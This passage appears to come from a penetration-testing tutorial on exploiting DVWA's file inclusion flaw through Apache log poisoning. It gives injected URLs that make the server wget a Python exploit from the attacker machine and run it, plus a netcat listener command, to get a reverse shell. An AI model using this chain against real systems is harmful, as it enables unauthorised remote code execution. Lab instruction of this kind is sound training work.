Now, let's assume that Netcat is not installed on the server. We will make use of Python to obtain the shell. As the underlying server is Linux based, by default, Python would be installed on it. We would therefore modify our exploit command as follows:
http://192.168.1.102/dvwa/vulnerabilities/fi/page=/var/log/apache2/access.log&cmd=wget http://192.168.1.102/exp.py -O /tmp/exp.py
As can be seen, we will create an exploit file written in Python and will serve it on our attacker machine. Since, for the current example, both the attacker and the victim are on same machine, the URL is http://192.168.1.102. The contents of the exploit file are shown here:
Downloading the exploit file will complete the first step of our exploitation process. The second step will be to execute it and get back the listener. This can be executed by accessing the following URL: http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=python /tmp/exp.py
Let's take a look at this in action:
- Download and save the Python exploit in the /tmp folder: http://192.168.1.102/dvwa/vulnerabilities/fi/page=/var/log/apache2/access.log&cmd=wget http://192.168.1.102/exp.py -O /tmp/exp.py
- Validate whether it has saved successfully:
- Start the netcat listener on 444: nc -nlvp 4444.
- Launch the command that invokes the exp.py script to connect back to the attacker box: http://192.168.1.102/dvwa/vulnerabilities/fi/page=/var/log/apache2/access.log&cmd=python /tmp/exp.py.
Let's now see whether our listener has obtained the shell:
As we can see from the preceding screenshot, we have successfully obtained the shell.